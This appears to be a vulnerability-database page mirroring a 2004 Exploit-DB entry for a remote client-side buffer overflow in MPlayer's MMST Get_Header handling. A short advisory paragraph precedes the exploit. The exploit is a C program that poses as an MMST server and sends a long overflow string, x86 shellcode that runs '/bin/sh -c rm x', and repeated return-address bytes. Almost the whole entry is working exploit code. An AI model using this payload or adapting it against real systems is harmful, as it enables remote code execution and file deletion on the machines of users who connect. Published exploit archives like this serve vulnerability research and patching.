Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAriel BerkmanEDB-ID:24853
HistoryDec 15, 2004 - 12:00 a.m.

MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow

2004-12-1500:00:00
Ariel Berkman
www.exploit-db.com
13

7.4 High

AI Score

Confidence

Low

JSON
// source: https://www.securityfocus.com/bid/11962/info

A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

char payload[] = {
 0xeb ,0x47
 ,0x59
 ,0x89 ,0xca
 ,0x83 ,0xc2 ,0x18
 ,0x89 ,0x11
 ,0x31 ,0xc0
 ,0x89 ,0x41 ,0x04
 ,0x83 ,0xc2 ,0x13
 ,0x89 ,0x51 ,0x08
 ,0x83 ,0xc2 ,0x08
 ,0x89 ,0x51 ,0x0c
 ,0x83 ,0xc2 ,0x03
 ,0x89 ,0x51 ,0x10
 ,0x89 ,0x41 ,0x14
 ,0x88 ,0x41 ,0x2a
 ,0x88 ,0x41 ,0x32
 ,0x88 ,0x41 ,0x35
 ,0x88 ,0x41 ,0x3a
 ,0x51
 ,0x83 ,0xc1 ,0x08
 ,0x51
 ,0x83 ,0xc1 ,0x20
 ,0x83 ,0xc1 ,0x03
 ,0x51
 ,0x83 ,0xc0 ,0x3b
 ,0x50
 ,0xcd ,0x80
 ,0x31 ,0xc0
 ,0x50
 ,0x40
 ,0x50
 ,0xcd ,0x80
 ,0xe8 ,0xb4 ,0xff ,0xff ,0xff
 ,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
 ,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
 ,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
 ,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
 ,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
 ,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
 ,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
 ,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
 ,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
 ,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;

#include <stdio.h>

main()
{

char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++) 
        putchar('A');
for (i=0;i<sizeof payload;i++)
        putchar (payload[i]);

printf("123");
for (i=0;i<20000;i++)           // RA all the way....
{
        putchar(0x01);
        putchar(0x15);
        putchar(0xbb);
        putchar(0xbf);
}
fflush(stdout);
}

7.4 High

AI Score

Confidence

Low

JSON